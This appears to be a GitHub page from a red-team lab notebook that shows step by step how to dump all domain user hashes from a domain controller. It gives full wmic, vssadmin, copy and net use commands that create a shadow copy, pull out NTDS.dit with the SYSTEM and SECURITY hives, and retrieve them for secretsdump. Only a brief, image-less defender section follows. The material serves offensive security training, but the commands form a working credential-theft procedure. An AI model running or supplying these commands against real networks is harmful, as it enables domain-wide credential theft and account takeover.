Skip to content

Latest commit

 

History

History
67 lines (41 loc) · 2.27 KB

dumping-domain-controller-hashes-via-wmic-and-shadow-copy-using-vssadmin.md

File metadata and controls

67 lines (41 loc) · 2.27 KB

Dumping Domain Controller Hashes via wmic and Vssadmin Shadow Copy

This quick labs hows how to dump all user hashes from the DC by creating a shadow copy of the C drive using vssadmin - remotely.

This lab assumes the attacker has already gained administratrative access to the domain controller.

Execution

Create a shadow copy of the C drive of the Domain Controller:

{% code title="attacker@victim" %}

wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c vssadmin create shadow /for=C: 2>&1"

{% endcode %}

Copy the NTDS.dit, SYSTEM and SECURITY hives to C:\temp on the DC01:

{% code title="attacker@victim" %}

wmic /node:dc01 /user:administrator@offense /password:123456 process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\temp\ & copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY c:\temp\"

{% endcode %}

Below shows the above command executed on the attacking machine (right) and the files being dumped to c:\temp on the DC01 on the left:

Mount the DC01\c$\temp locally in order to retrieve the dumped files:

{% code title="attacker@victim" %}

net use j: \\dc01\c$\temp /user:administrator 123456; dir j:\

{% endcode %}

Now, of you go extracting hashes with secretsdump as shown here:

{% content-ref url="ntds.dit-enumeration.md" %} ntds.dit-enumeration.md {% endcontent-ref %}

Observations

A quick note for defenders on the proces ancestry:

and of course commandlines:

as well as service states:

...and of course the lateral movement piece:

References

https://twitter.com/netmux/status/1123936748000690178?s=12